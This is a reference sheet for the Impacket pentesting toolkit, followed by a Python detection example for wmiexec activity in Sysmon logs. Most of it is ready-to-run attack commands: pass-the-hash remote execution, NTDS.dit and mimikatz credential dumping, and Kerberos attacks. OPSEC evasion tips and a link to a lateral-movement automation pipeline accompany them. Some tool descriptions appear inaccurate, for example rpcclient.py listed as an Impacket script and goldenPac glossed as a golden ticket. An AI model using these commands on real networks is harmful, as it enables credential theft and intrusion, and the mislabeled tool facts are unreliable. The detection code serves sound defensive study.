# Impacket Usage Reference

## Overview

Impacket is a collection of Python classes for working with network protocols. It is a core tool for Windows pentesting.

## Installation

```bash
pip install impacket

# Or from source:
git clone https://github.com/fortra/impacket
cd impacket && pip install .
```

## Key Scripts

### Remote Execution

```bash
# psexec.py - Pass-the-Hash
python3 psexec.py DOMAIN/user@target.lan -hashes lm:ntlm

# wmiexec.py - Stealth WMI exec
python3 wmiexec.py DOMAIN/user@target.lan -hashes lm:ntlm

# atexec.py - Scheduled task exec
python3 atexec.py DOMAIN/user@target.lan -hashes lm:ntlm
```

### Credential Extraction

```bash
# secretsdump.py - NTDS.dit extraction
python3 secretsdump.py DOMAIN/user@target.lan -hashes lm:ntlm

# mimikatz.py - Remote mimikatz
python3 mimikatz.py DOMAIN/user@target.lan -hashes lm:ntlm
```

### Kerberos Attacks

```bash
# getTGT.py - Ticket extraction
python3 getTGT.py DOMAIN/user:password

# goldenPac.py - Golden ticket + auto-exec
python3 goldenPac.py DOMAIN/user@target.lan
```

### Network Discovery

```bash
# smbclient.py - Anonymous SMB share browsing
python3 smbclient.py DOMAIN/user@target.lan

# rpcclient.py - RPC bind
python3 rpcclient.py target.lan -N
```

## OPSEC Notes

- wmiexec leaves fewer artifacts than psexec
- Use -dc-ip for Kerberoasting
- secretsdump requires domain admin or NTDS.dit access
- Always check firewall rules before port scanning

## GreySec Engagement Notes

Used in: `exploit-pipeline` for lateral movement automation.

See: https://gsfiles.tail57cd.ts.net/greysec/exploit-pipeline
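
## Detection Example

The OPSEC note that wmiexec leaves fewer artifacts than psexec does not mean it leaves none: in its default mode, wmiexec.py runs each command as `cmd.exe` under `WmiPrvSE.exe` and redirects output to a `__<epoch>` file on an administrative share via `\\127.0.0.1`. The following is an added example, not part of the original reference or of Impacket; the field names follow Sysmon Event ID 1, and the function names, host names and sample events are constructed for illustration.

```python
import re

# Output redirection appended by wmiexec.py in its default mode:
#   cmd.exe /Q /c <command> 1> \\127.0.0.1\<share>\__<epoch> 2>&1
# Assumption: the operator kept the default output handling; the share is captured.
REDIRECT = re.compile(
    r"1>\s*\\\\127\.0\.0\.1\\(?P<share>[\w-]+\$)\\__\d+(?:\.\d+)?\s+2>&1"
)

def match_wmiexec(event):
    """Return the share name if a process-creation event fits the pattern, else None."""
    if not event.get("ParentImage", "").lower().endswith("\\wmiprvse.exe"):
        return None
    if not event.get("Image", "").lower().endswith("\\cmd.exe"):
        return None
    m = REDIRECT.search(event.get("CommandLine", ""))
    return m.group("share") if m else None

def find_wmiexec(events):
    """Return (computer, share, command line) for every matching event."""
    hits = []
    for ev in events:
        share = match_wmiexec(ev)
        if share:
            hits.append((ev["Computer"], share, ev["CommandLine"]))
    return hits

# Constructed sample events (not real telemetry), Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Computer": "WS01.example.lan",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.1234567 2>&1"},
    {"Computer": "WS02.example.lan",  # WMI-launched script, no share redirection
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Program Files\Vendor\inventory.cmd"'},
    {"Computer": "WS03.example.lan",  # interactive shell writing to a local file
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir 1> C:\Temp\out.txt 2>&1"},
]

if __name__ == "__main__":
    for computer, share, cmdline in find_wmiexec(SAMPLE_EVENTS):
        print(f"[wmiexec-like] {computer} share={share} cmd={cmdline}")
```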